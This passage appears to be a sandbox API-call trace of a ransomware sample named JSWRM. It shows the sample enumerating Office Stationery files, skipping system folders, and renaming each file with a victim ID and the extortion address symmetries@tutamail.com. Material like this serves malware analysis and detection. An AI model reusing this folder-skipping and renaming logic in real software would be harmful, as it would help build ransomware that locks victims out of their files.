lpUsedDefaultChar=0x0) returned 5 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.832] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.832] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.832] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.832] CloseHandle (hObject=0xffffffff) returned 1 [0068.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0068.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0068.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0068.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.834] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2=".") returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="..") returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="...") returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="windows") returned -1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="recovery") returned -1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="perflogs") returned -1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="documents and settings") returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="system volume information") returned -1 [0068.834] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="msocache") returned -1 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 17 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 17 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.835] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10077367668300064) returned 0 [0068.835] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.835] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.835] CloseHandle (hObject=0xffffffff) returned 1 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0068.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.835] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.836] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2=".") returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="..") returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="...") returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="windows") returned -1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="recovery") returned -1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="perflogs") returned -1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="documents and settings") returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="system volume information") returned -1 [0068.836] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="msocache") returned -1 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x240fc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 16 [0068.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GreenBubbles.jpg", cchWideChar=16, lpMultiByteStr=0x240ef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 16 [0068.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.839] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10090355649403504) returned 0 [0068.839] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.839] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.839] CloseHandle (hObject=0xffffffff) returned 1 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.840] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2=".") returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="..") returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="...") returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="windows") returned -1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="recovery") returned -1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="perflogs") returned -1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="documents and settings") returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="system volume information") returned -1 [0068.840] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="msocache") returned -1 [0068.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hand Prints.htm", lpUsedDefaultChar=0x0) returned 15 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hand Prints.htm", lpUsedDefaultChar=0x0) returned 15 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.841] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10077367668300064) returned 0 [0068.841] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.841] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.841] CloseHandle (hObject=0xffffffff) returned 1 [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.841] 